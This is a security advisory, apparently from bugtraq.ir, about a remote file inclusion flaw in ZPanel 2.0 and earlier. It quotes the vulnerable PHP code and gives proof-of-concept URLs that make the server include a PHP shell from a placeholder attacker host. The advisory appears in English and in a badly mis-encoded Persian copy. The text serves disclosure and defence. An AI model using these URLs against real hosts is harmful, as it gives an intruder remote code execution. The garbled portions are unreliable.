‫"ت‬#$% &'() &* +,-‫ز‬#*

:!"#$%

ZPanel Remote File Inclusion

ZPanel is a hosting control panel used by web hosts to give their users a friendly interface
.to manage any aspects of their hosting or account information
.ZPanel is an open source project and runs on Windows and Linux
: zpanel tested on
Windows : 2000 Adv. Server,2000 Server,2003 Ent. Server,XP Professional
Linux : SuSE 9.1, 9.2 ,Debian,Fedora 2,FreeBSD 4.9, 5.2.1,Mandrake 9.1, 9.2,Redhat 7.9, 9

http://www.thezpanel.com
http://www.zee-way.com
http://forge.novell.com/modules/xfmod/project/?zpanel

:Credit
The information has been provided by Hamid Ebadi
The original article can be found at : http://www.bugtraq.ir

:Vulnerable Systems
(Version: ZPanel 2.0 (and below
( also tested on ZPanel-v25-BETA11)

:Description
Input passed to the "page" parameter in "zpanel.php" and "body" parameter in
."templates/ZPanelV2/template.php" isn't properly verified, before it is used to include files
.This can be exploited to include arbitrary files from remote and local resources

: Vulnerable Code

http://[host]/ZPanel/zpanel.php

zpanel.php line : 21 //
}((['if (!isset($_GET['page
;"body = "main.php$
}else {
;"body = $_GET['page'] . ".php$
{
... //

line : 38 //
Loading template//
;['templatefolder = $row_Config['template$
;('include('templates/'.$templatefolder.'/template.php
 http://[host]/ZPanel/templates/ZPanelV2/template.php

template.php //
line : 63 //

<? ;(php include ($body?>

: POC exploit
?http://[host]/ZPanel/zpanel.php?page=http://attacker/phpshell.txt
?http://[host]/ZPanel/templates/ZPanelV2/template.php?body=http://attacker/phpshell.txt

http://www.bugtraq.ir #

ZPanel ‫ در‬12‫ر‬#3 45#6 +789: ‫<ی‬5=: >97‫آ‬

. +7‫ ا‬mysql ‫ و‬php &5#: <* BC8D9E ‫وز و‬FD5‫ی و‬#G HD9I7#G ‫ وب‬+5<5F% ‫ز *<ای‬#* ‫رس‬87 ‫ار‬L6‫<م ا‬N O5 ZPanel

. FP#* 1% 17<I7‫ د‬45#Q <5‫ار از آدرس ز‬L6‫<م ا‬N R5‫رد ا‬8% ‫< در‬I,9* ‫ت‬#STU‫ا‬
http://www.thezpanel.com
http://www.zee-way.com
http://forge.novell.com/modules/xfmod/project/?zpanel

: <5=: >97‫ی آ‬#G &VWN

ZPanel 2.0
ZPanel-v25-BETA11

. FDIWG <5=: >97‫" آ‬#XIY‫*& ا‬#,Z +[S &* L9N 1[\Q ‫ی‬#G &VWN

: ‫ت‬#'9]8Z
^9: "templates/ZPanelV2/template.php " ‫" در‬body" _D`XG ‫" و‬zpanel.php " ‫" در‬page " <I%‫را‬#: ‫ورودی‬
. FN8P 1XN 17‫ *<ر‬1IaD%‫ظ ا‬#'E ‫> از‬7#D% ‫رت‬8c* 45#6 +789: ‫از‬
&C FP#* 1% (‫<ور‬7) 1[3‫ و دا‬12‫ر‬#3 d*#D% ‫اه از‬8VE‫ي د‬#G 45#6 +789: &* ‫در‬#Q ‫<ي‬5=: >97‫ آ‬R5‫& *& ا‬28Z #* <-‫ذ‬8(N
.‫د‬8P 1% hG‫<ا‬6 <-‫ذ‬8(N ‫اه *<ای‬8VE‫<ب د‬V% ‫ی‬#G FC ‫<ا‬2‫زه ا‬#2‫ ا‬+E#Y R5‫در ا‬

: <5=: >97‫ی آ‬#G FC

http://[host]/ZPanel/zpanel.php

zpanel.php line : 21 //
}((['if (!isset($_GET['page
;"body = "main.php$
}else {
;"body = $_GET['page'] . ".php$
{
 ... //

line : 38 //
Loading template//
;['templatefolder = $row_Config['template$
;('include('templates/'.$templatefolder.'/template.php

http://[host]/ZPanel/templates/ZPanelV2/template.php

template.php //
line : 63 //

<? ;(php include ($body?>

: #S‫ت اد‬#\i‫<ب *<ای ا‬V% FC

-1
?http://[host]/ZPanel/zpanel.php?page=http://attacker/phpshell.txt
?http://[host]/ZPanel/templates/ZPanelV2/template.php?body=http://attacker/phpshell.txt -2

.FP#* 1% ‫ظ‬8('% ‫ل‬#I9k5‫ د‬+9D%‫& ا‬N#7‫ق *<ای ر‬8$Y 1%#XZ ‫ه و‬FP m,C ‫دی‬#\S F9XY n78Z ‫<ی‬5=: >97‫ آ‬R5‫ا‬
‫دی‬#\S F9XY